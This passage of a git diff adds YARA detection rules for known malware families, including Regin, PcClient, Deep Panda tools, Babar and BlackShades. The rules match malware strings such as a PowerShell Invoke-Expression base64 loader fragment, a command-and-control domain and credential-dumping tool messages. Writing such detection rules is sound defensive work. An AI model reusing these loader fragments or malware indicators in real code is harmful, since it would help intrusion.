+ $s8 = "'user registry info - userPort: %x" fullword ascii
+ $s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
+ $s10 = "Kernel debugger is using port at address %X" fullword ascii
+ $s12 = "Release - freeing multi context" fullword ascii
+ $s13 = "Serial driver will not load port" fullword ascii
+ $s14 = "'user registry info - userAddressSpace: %d" fullword ascii
+ $s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
+ $s20 = "'user registry info - userIndexed: %d" fullword ascii
+ condition:
+ all of them and filesize < 110KB and filesize > 80KB
+}
+
+rule Regin_Sample_2 {
+ meta:
+ description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
+ author = "@MalwrSignatures"
+ date = "26.11.14"
+ hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
+ strings:
+ $s0 = "\\SYSTEMROOT\\system32\\lsass.exe" fullword wide
+ $s1 = "atapi.sys" fullword wide
+ $s2 = "disk.sys" fullword wide
+ $s3 = "IoGetRelatedDeviceObject" fullword ascii
+ $s4 = "HAL.dll" fullword ascii
+ $s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" fullword ascii
+ $s6 = "PsGetCurrentProcessId" fullword ascii
+ $s7 = "KeGetCurrentIrql" fullword ascii
+ $s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+ $s9 = "KeSetImportanceDpc" fullword ascii
+ $s10 = "KeQueryPerformanceCounter" fullword ascii
+ $s14 = "KeInitializeEvent" fullword ascii
+ $s15 = "KeDelayExecutionThread" fullword ascii
+ $s16 = "KeInitializeTimerEx" fullword ascii
+ $s18 = "PsLookupProcessByProcessId" fullword ascii
+ $s19 = "ExReleaseFastMutexUnsafe" fullword ascii
+ $s20 = "ExAcquireFastMutexUnsafe" fullword ascii
+ condition:
+ all of them and filesize < 40KB and filesize > 30KB
+}
+
+rule Regin_Sample_3 {
+ meta:
+ description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
+ author = "@Malwrsignatures"
+ date = "27.11.14"
+ hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
+ strings:
+ $hd = { fe ba dc fe }
+
+ $s0 = "Service Pack x" fullword wide
+ $s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+ $s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
+ $s3 = "mntoskrnl.exe" fullword wide
+ $s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" fullword wide
+ $s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
+ $s6 = "Service Pack" fullword wide
+ $s7 = ".sys" fullword wide
+ $s8 = ".dll" fullword wide
+
+ $s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" fullword wide
+ $s11 = "IoGetRelatedDeviceObject" fullword ascii
+ $s12 = "VMEM.sys" fullword ascii
+ $s13 = "RtlGetVersion" fullword wide
+ $s14 = "ntkrnlpa.exe" fullword ascii
+ condition:
+ ( $hd at 0 ) and all of ($s*) and filesize > 160KB and filesize < 200KB
+}
+
+rule Regin_Sample_Set_1 {
+ meta:
+ description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
+ author = "@MalwrSignatures"
+ date = "26.11.14"
+ hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
+ hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"
+ strings:
+ $s0 = "HAL.dll" fullword ascii
+ $s1 = "IoGetDeviceObjectPointer" fullword ascii
+ $s2 = "MaximumPortsServiced" fullword wide
+ $s3 = "KeGetCurrentIrql" fullword ascii
+ $s4 = "ntkrnlpa.exe" fullword ascii
+ $s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+ $s6 = "ConnectMultiplePorts" fullword wide
+ $s7 = "\\SYSTEMROOT" fullword wide
+ $s8 = "IoWriteErrorLogEntry" fullword ascii
+ $s9 = "KeQueryPerformanceCounter" fullword ascii
+ $s10 = "KeServiceDescriptorTable" fullword ascii
+ $s11 = "KeRemoveEntryDeviceQueue" fullword ascii
+ $s12 = "SeSinglePrivilegeCheck" fullword ascii
+ $s13 = "KeInitializeEvent" fullword ascii
+ $s14 = "IoBuildDeviceIoControlRequest" fullword ascii
+ $s15 = "KeRemoveDeviceQueue" fullword ascii
+ $s16 = "IofCompleteRequest" fullword ascii
+ $s17 = "KeInitializeSpinLock" fullword ascii
+ $s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
+ $s19 = "IoCreateDevice" fullword ascii
+ $s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii
+ condition:
+ all of them and filesize < 40KB and filesize > 30KB
+}
+
+rule Regin_Sample_Set_2 {
+ meta:
+ description = "Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+ author = "@MalwrSignatures"
+ date = "27.11.14"
+ hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
+ hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+ strings:
+ $hd = { fe ba dc fe }
+
+ $s0 = "d%ls%ls" fullword wide
+ $s1 = "\\\\?\\UNC" fullword wide
+ $s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
+ $s3 = "\\\\?\\UNC\\" fullword wide
+ $s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
+ $s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
+ $s6 = "\\\\.\\Global\\%s" fullword wide
+ $s7 = "temp" fullword wide
+ $s8 = "\\\\.\\%s" fullword wide
+ $s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
+
+ $s10 = "sscanf" fullword ascii
+ $s11 = "disp.dll" fullword ascii
+ $s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
+ $s13 = "%d.%d.%d.%d%c" fullword ascii
+ $s14 = "imagehlp.dll" fullword ascii
+ $s15 = "%hd %d" fullword ascii
+ condition:
+ ( $hd at 0 ) and all of ($s*) and filesize < 450KB and filesize > 360KB
+}
+
+rule apt_regin_legspin {
+ meta:
+ copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin's Legspin module"
+ version = "1.0"
+ last_modified = "2015-01-22"
+ reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+ md5 = "29105f46e4d33f66fee346cfd099d1cc"
+ strings:
+ $mz="MZ"
+ $a1="sharepw"
+ $a2="reglist"
+ $a3="logdump"
+ $a4="Name:" wide
+ $a5="Phys Avail:"
+ $a6="cmd.exe" wide
+ $a7="ping.exe" wide
+ $a8="millisecs"
+ condition:
+ ($mz at 0) and all of ($a*)
+}
+
+rule apt_regin_hopscotch {
+ meta:
+ copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin's Hopscotch module"
+ version = "1.0"
+ last_modified = "2015-01-22"
+ reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+ md5 = "6c34031d7a5fc2b091b623981a8ae61c"
+ strings:
+
+ $mz="MZ"
+
+ $a1="AuthenticateNetUseIpc"
+ $a2="Failed to authenticate to"
+ $a3="Failed to disconnect from"
+ $a4="%S\\ipc$" wide
+ $a5="Not deleting..."
+ $a6="CopyServiceToRemoteMachine"
+ $a7="DH Exchange failed"
+ $a8="ConnectToNamedPipes"
+ condition:
+ ($mz at 0) and all of ($a*)
+}
+
+
+rule apt_regin_2011_32bit_stage1 {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin 32 bit stage 1 loaders"
+ version = "1.0"
+ last_modified = "2014-11-18"
+strings:
+$key1={331015EA261D38A7}
+$key2={9145A98BA37617DE}
+$key3={EF745F23AA67243D}
+$mz="MZ"
+condition:
+($mz at 0) and any of ($key*) and filesize < 300000
+}
+rule apt_regin_rc5key {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin RC5 decryption keys"
+ version = "1.0"
+ last_modified = "2014-11-18"
+strings:
+$key1={73 23 1F 43 93 E1 9F 2F 99 0C 17 81 5C FF B4 01}
+$key2={10 19 53 2A 11 ED A3 74 3F C3 72 3F 9D 94 3D 78}
+condition:
+any of ($key*)
+}
+
+rule apt_regin_vfs {
+meta:
+ copyright = "Kaspersky Lab"
+ author = "Kaspersky Lab"
+ description = "Rule to detect Regin VFSes"
+ version = "1.0"
+ last_modified = "2014-11-18"
+strings:
+ $a1={00 02 00 08 00 08 03 F6 D7 F3 52}
+ $a2={00 10 F0 FF F0 FF 11 C7 7F E8 52}
+ $a3={00 04 00 10 00 10 03 C2 D3 1C 93}
+ $a4={00 04 00 10 C8 00 04 C8 93 06 D8}
+condition:
+ ($a1 at 0) or ($a2 at 0) or ($a3 at 0) or ($a4 at 0)
+}
+
+rule apt_regin_dispatcher_disp_dll {
+
+meta:
+ copyright = "Kaspersky Lab"
+ author = "Kaspersky Lab"
+ description = "Rule to detect Regin disp.dll dispatcher"
+ version = "1.0"
+ last_modified = "2014-11-18"
+
+strings:
+ $mz="MZ"
+ $string1="shit"
+ $string2="disp.dll"
+ $string3="255.255.255.255"
+ $string4="StackWalk64"
+ $string5="imagehlp.dll"
+condition:
+ ($mz at 0) and (all of ($string*))
+}
+
+rule apt_regin_2013_64bit_stage1 {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin 64 bit stage 1 loaders"
+ version = "1.0"
+ last_modified = "2014-11-18"
+ filename="wshnetc.dll"
+ md5="bddf5afbea2d0eed77f2ad4e9a4f044d"
+ filename="wsharp.dll"
+ md5="c053a0a3f1edcbbfc9b51bc640e808ce"
+strings:
+$mz="MZ"
+$a1="PRIVHEAD"
+$a2="\\\\.\\PhysicalDrive%d"
+$a3="ZwDeviceIoControlFile"
+condition:
+($mz at 0) and (all of ($a*)) and filesize < 100000
+}
+
diff --git a/malware/APT_c16.yar b/malware/APT_c16.yar
new file mode 100644
index 0000000..65cc46e
--- /dev/null
+++ b/malware/APT_c16.yar
@@ -0,0 +1,80 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule apt_c16_win_memory_pcclient
+{
+ meta:
+ author = "@dragonthreatlab "
+ md5 = "ec532bbe9d0882d403473102e9724557"
+ description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+ strings:
+ $str1 = "Kill You" ascii
+ $str2 = "%4d-%02d-%02d %02d:%02d:%02d" ascii
+ $str3 = "%4.2f KB" ascii
+ $encodefunc = {8A 08 32 CA 02 CA 88 08 40 4E 75 F4}
+ condition:
+ all of them
+}
+
+rule apt_c16_win_disk_pcclient
+{
+ meta:
+ author = "@dragonthreatlab "
+ md5 = "55f84d88d84c221437cd23cdbc541d2e"
+ description = "Encoded version of pcclient found on disk"
+ strings:
+ $header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
+ condition:
+ $header at 0
+}
+
+rule apt_c16_win32_dropper
+{
+ meta:
+ author = "@dragonthreatlab"
+ md5 = "ad17eff26994df824be36db246c8fb6a"
+ description = "APT malware used to drop PcClient RAT"
+ strings:
+ $mz = {4D 5A}
+ $str1 = "clbcaiq.dll" ascii
+ $str2 = "profapi_104" ascii
+ $str3 = "/ShowWU" ascii
+ $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii
+ $str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E}
+ condition:
+ $mz at 0 and all of ($str*)
+}
+
+rule apt_c16_win_swisyn
+{
+ meta:
+ author = "@dragonthreatlab"
+ md5 = "a6a18c846e5179259eba9de238f67e41"
+ description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+ strings:
+ $mz = {4D 5A}
+ $str1 = "/ShowWU" ascii
+ $str2 = "IsWow64Process"
+ $str3 = "regsvr32 "
+ $str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
+ condition:
+ $mz at 0 and all of ($str*)
+}
+
+rule apt_c16_win_wateringhole
+{
+ meta:
+ author = "@dragonthreatlab "
+ description = "Detects code from APT wateringhole"
+ strings:
+ $str1 = "function runmumaa()"
+ $str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
+ $str3 = "function MoSaklgEs7(k)"
+ condition:
+ any of ($str*)
+}
+
diff --git a/malware/APT_pcclient.yar b/malware/APT_pcclient.yar
new file mode 100644
index 0000000..420512d
--- /dev/null
+++ b/malware/APT_pcclient.yar
@@ -0,0 +1,27 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule backdoor_apt_pcclient
+{
+meta:
+ author = "@patrickrolsen"
+ maltype = "APT.PCCLient"
+ filetype = "DLL"
+ version = "0.1"
+ description = "Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)"
+ date = "2012-10"
+strings:
+ $magic = { 4d 5a } // MZ
+ $string1 = "www.micro1.zyns.com"
+ $string2 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
+ $string3 = "msacm32.drv" wide
+ $string4 = "C:\\Windows\\Explorer.exe" wide
+ $string5 = "Elevation:Administrator!" wide
+ $string6 = "C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdb"
+condition:
+ $magic at 0 and 4 of ($string*)
+}
diff --git a/malware/Android_Malware.yar b/malware/Android_Malware.yar
new file mode 100644
index 0000000..cf0e25a
--- /dev/null
+++ b/malware/Android_Malware.yar
@@ -0,0 +1,26 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Android_Malware : iBanking
+{
+ meta:
+ author = "Xylitol xylitol@malwareint.com"
+ date = "2014-02-14"
+ description = "Match first two bytes, files and string present in iBanking"
+ reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3166"
+
+ strings:
+ // Generic android
+ $pk = {50 4B}
+ $file1 = "AndroidManifest.xml"
+ // iBanking related
+ $file2 = "res/drawable-xxhdpi/ok_btn.jpg"
+ $string1 = "bot_id"
+ $string2 = "type_password2"
+ condition:
+ ($pk at 0 and 2 of ($file*) and ($string1 or $string2))
+}
diff --git a/malware/Anthem_DeepPanda.yar b/malware/Anthem_DeepPanda.yar
new file mode 100644
index 0000000..455bc7a
--- /dev/null
+++ b/malware/Anthem_DeepPanda.yar
@@ -0,0 +1,100 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+/* Anthem Deep Panda APT */
+
+rule Anthem_DeepPanda_sl_txt_packed {
+ meta:
+ description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed"
+ author = "Florian Roth"
+ date = "2015/02/08"
+ hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
+ strings:
+ $s0 = "Command line port scanner" fullword wide
+ $s1 = "sl.exe" fullword wide
+ $s2 = "CPports.txt" fullword ascii
+ $s3 = ",GET / HTTP/.}" fullword ascii
+ $s4 = "Foundstone Inc." fullword wide
+ $s9 = " 2002 Foundstone Inc." fullword wide
+ $s15 = ", Inc. 2002" fullword ascii
+ $s20 = "ICMP Time" fullword ascii
+ condition:
+ all of them
+}
+
+rule Anthem_DeepPanda_lot1 {
+ meta:
+ description = "Anthem Hack Deep Panda - lot1.tmp-pwdump"
+ author = "Florian Roth"
+ date = "2015/02/08"
+ hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
+ strings:
+ $s0 = "Unable to open target process: %d, pid %d" fullword ascii
+ $s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+ $s2 = "Target: Failed to load SAM functions." fullword ascii
+ $s5 = "Error writing the test file %s, skipping this share" fullword ascii
+ $s6 = "Failed to create service (%s/%s), error %d" fullword ascii
+ $s8 = "Service start failed: %d (%s/%s)" fullword ascii
+ $s12 = "PwDump.exe" fullword ascii
+ $s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
+ $s14 = ":\\\\.\\pipe\\%s" fullword ascii
+ $s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
+ $s16 = "dump logon session" fullword ascii
+ $s17 = "Timed out waiting to get our pipe back" fullword ascii
+ $s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
+ $s20 = "%s\\%s.exe" fullword ascii
+ condition:
+ 10 of them
+}
+
+rule Anthem_DeepPanda_htran_exe {
+ meta:
+ description = "Anthem Hack Deep Panda - htran-exe"
+ author = "Florian Roth"
+ date = "2015/02/08"
+ hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
+ strings:
+ $s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+ $s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
+ $s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" fullword ascii
+ $s3 = "[SERVER]connection to %s:%d error" fullword ascii
+ $s4 = "-tran <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+ $s5 = "[-] ERROR: Must supply logfile name." fullword ascii
+ $s6 = "[-] There is a error...Create a new connection." fullword ascii
+ $s7 = "[+] Accept a Client on port %d from %s" fullword ascii
+ $s8 = "======================== htran V%s =======================" fullword ascii
+ $s9 = "[-] Socket Listen error." fullword ascii
+ $s10 = "[-] ERROR: open logfile" fullword ascii
+ $s11 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+ $s12 = "[+] Make a Connection to %s:%d ......" fullword ascii
+ $s14 = "Recv %5d bytes from %s:%d" fullword ascii
+ $s15 = "[+] OK! I Closed The Two Socket." fullword ascii
+ $s16 = "[+] Waiting another Client on port:%d...." fullword ascii
+ $s17 = "[+] Accept a Client on port %d from %s ......" fullword ascii
+ $s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+ condition:
+ 10 of them
+}
+
+rule Anthem_DeepPanda_Trojan_Kakfum {
+ meta:
+ description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
+ author = "Florian Roth"
+ date = "2015/02/08"
+ hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
+ hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
+ strings:
+ $s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
+ $s1 = "%s\\sqlsrv32.dll" fullword ascii
+ $s2 = "%s\\sqlsrv64.dll" fullword ascii
+ $s3 = "%s\\%d.tmp" fullword ascii
+ $s4 = "ServiceMaix" fullword ascii
+ $s15 = "sqlserver" fullword ascii
+ condition:
+ all of them
+}
diff --git a/malware/Babar.yar b/malware/Babar.yar
new file mode 100644
index 0000000..2cf2087
--- /dev/null
+++ b/malware/Babar.yar
@@ -0,0 +1,40 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule SNOWGLOBE_Babar_Malware {
+ meta:
+ description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
+ author = "Florian Roth"
+ reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
+ date = "2015/02/18"
+ hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
+ score = 80
+ strings:
+ $mz = { 4d 5a }
+ $z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
+ $z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
+ $z2 = "ExecQueryFailled!" fullword ascii
+ $z3 = "NBOT_COMMAND_LINE" fullword
+ $z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
+
+ $s1 = "/s /n %s \"%s\"" fullword ascii
+ $s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
+ $s3 = "/c start /wait " fullword ascii
+ $s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
+
+ $x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
+ $x2 = "%COMMON_APPDATA%" fullword ascii
+ $x4 = "CONOUT$" fullword ascii
+ $x5 = "cmd.exe" fullword ascii
+ $x6 = "DLLPATH" fullword ascii
+ condition:
+ ( $mz at 0 ) and filesize < 1MB and
+ (
+ ( 1 of ($z*) and 1 of ($x*) ) or
+ ( 3 of ($s*) and 4 of ($x*) )
+ )
+}
diff --git a/malware/Bangat.yar b/malware/Bangat.yar
new file mode 100644
index 0000000..61735d2
--- /dev/null
+++ b/malware/Bangat.yar
@@ -0,0 +1,54 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BangatCode : Bangat Family
+{
+ meta:
+ description = "Bangat code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-10"
+
+ strings:
+ // dec [ebp + procname], push eax, push edx, call get procaddress
+ $ = { FE 4D ?? 8D 4? ?? 50 5? FF }
+
+ condition:
+ any of them
+}
+
+rule BangatStrings : Bangat Family
+{
+ meta:
+ description = "Bangat Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-07-10"
+
+ strings:
+ $lib1 = "DreatePipe"
+ $lib2 = "HetSystemDirectoryA"
+ $lib3 = "SeleaseMutex"
+ $lib4 = "DloseWindowStation"
+ $lib5 = "DontrolService"
+ $file = "~hhC2F~.tmp"
+ $mc = "~_MC_3~"
+
+ condition:
+ all of ($lib*) or $file or $mc
+}
+
+rule Bangat : Family
+{
+ meta:
+ description = "Bangat"
+ author = "Seth Hardy"
+ last_modified = "2014-07-10"
+
+ condition:
+ BangatCode or BangatStrings
+}
+
+
diff --git a/malware/BlackEnergy.yar b/malware/BlackEnergy.yar
new file mode 100644
index 0000000..42ba3d9
--- /dev/null
+++ b/malware/BlackEnergy.yar
@@ -0,0 +1,24 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BlackEnergy_BE_2 {
+ meta:
+ description = "Detects BlackEnergy 2 Malware"
+ author = "Florian Roth"
+ reference = "http://goo.gl/DThzLz"
+ date = "2015/02/19"
+ hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
+ strings:
+ $mz = { 4d 5a }
+ $s0 = "<description> Windows system utility service </description>" fullword ascii
+ $s1 = "WindowsSysUtility - Unicode" fullword wide
+ $s2 = "msiexec.exe" fullword wide
+ $s3 = "WinHelpW" fullword ascii
+ $s4 = "ReadProcessMemory" fullword ascii
+ condition:
+ ( $mz at 0 ) and filesize < 250KB and all of ($s*)
+}
diff --git a/malware/BlackShades.yar b/malware/BlackShades.yar
new file mode 100644
index 0000000..3a453a6
--- /dev/null
+++ b/malware/BlackShades.yar
@@ -0,0 +1,118 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BlackShades_3 : Trojan
+{
+ meta:
+ description = "BlackShades RAT"
+ author = "botherder https://github.com/botherder"
+
+ strings:
+ $mod1 = /(m)odAPI/
+ $mod2 = /(m)odAudio/
+ $mod3 = /(m)odBtKiller/
+ $mod4 = /(m)odCrypt/
+ $mod5 = /(m)odFuctions/
+ $mod6 = /(m)odHijack/
+ $mod7 = /(m)odICallBack/
+ $mod8 = /(m)odIInet/
+ $mod9 = /(m)odInfect/
+ $mod10 = /(m)odInjPE/
+ $mod11 = /(m)odLaunchWeb/
+ $mod12 = /(m)odOS/
+ $mod13 = /(m)odPWs/
+ $mod14 = /(m)odRegistry/
+ $mod15 = /(m)odScreencap/
+ $mod16 = /(m)odSniff/
+ $mod17 = /(m)odSocketMaster/
+ $mod18 = /(m)odSpread/
+ $mod19 = /(m)odSqueezer/
+ $mod20 = /(m)odSS/
+ $mod21 = /(m)odTorrentSeed/
+
+ $tmr1 = /(t)mrAlarms/
+ $tmr2 = /(t)mrAlive/
+ $tmr3 = /(t)mrAnslut/
+ $tmr4 = /(t)mrAudio/
+ $tmr5 = /(t)mrBlink/
+ $tmr6 = /(t)mrCheck/
+ $tmr7 = /(t)mrCountdown/
+ $tmr8 = /(t)mrCrazy/
+ $tmr9 = /(t)mrDOS/
+ $tmr10 = /(t)mrDoWork/
+ $tmr11 = /(t)mrFocus/
+ $tmr12 = /(t)mrGrabber/
+ $tmr13 = /(t)mrInaktivitet/
+ $tmr14 = /(t)mrInfoTO/
+ $tmr15 = /(t)mrIntervalUpdate/
+ $tmr16 = /(t)mrLiveLogger/
+ $tmr17 = /(t)mrPersistant/
+ $tmr18 = /(t)mrScreenshot/
+ $tmr19 = /(t)mrSpara/
+ $tmr20 = /(t)mrSprid/
+ $tmr21 = /(t)mrTCP/
+ $tmr22 = /(t)mrUDP/
+ $tmr23 = /(t)mrWebHide/
+
+ condition:
+ 10 of ($mod*) or 10 of ($tmr*)
+}
+
+rule BlackShades2 : Trojan
+{
+ meta:
+ author="Kevin Falcoz"
+ date="26/06/2013"
+ description="BlackShades Server"
+
+ strings:
+ $signature1={62 73 73 5F 73 65 72 76 65 72}
+ $signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
+ $signature3={6D 6F 64 49 6E 6A 50 45}
+
+ condition:
+ $signature1 and $signature2 and $signature3
+}
+
+rule BlackShades_4 : rat
+{
+ meta:
+ description = "BlackShades"
+ author = "Jean-Philippe Teissier / @Jipe_"
+ date = "2013-01-12"
+ filetype = "memory"
+ version = "1.0"
+
+ strings:
+ $a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 }
+ $b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B }
+ $c = { 62 73 73 5F 73 65 72 76 65 72 }
+ $d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
+ $e = { 6D 6F 64 49 6E 6A 50 45 }
+ $apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439"
+
+ condition:
+ any of ($a, $b, $c, $d, $e) or $apikey
+}
+
+
+rule BlackShades : Trojan
+{
+ meta:
+ author="Kevin Falcoz"
+ date="26/06/2013"
+ description="BlackShades Server"
+
+ strings:
+ $signature1={62 73 73 5F 73 65 72 76 65 72}
+ $signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
+ $signature3={6D 6F 64 49 6E 6A 50 45}
+
+ condition:
+ $signature1 and $signature2 and $signature3
+}
+
diff --git a/malware/Bolonyokte.yar b/malware/Bolonyokte.yar
new file mode 100644
index 0000000..98d5e93
--- /dev/null
+++ b/malware/Bolonyokte.yar
@@ -0,0 +1,52 @@
+/*
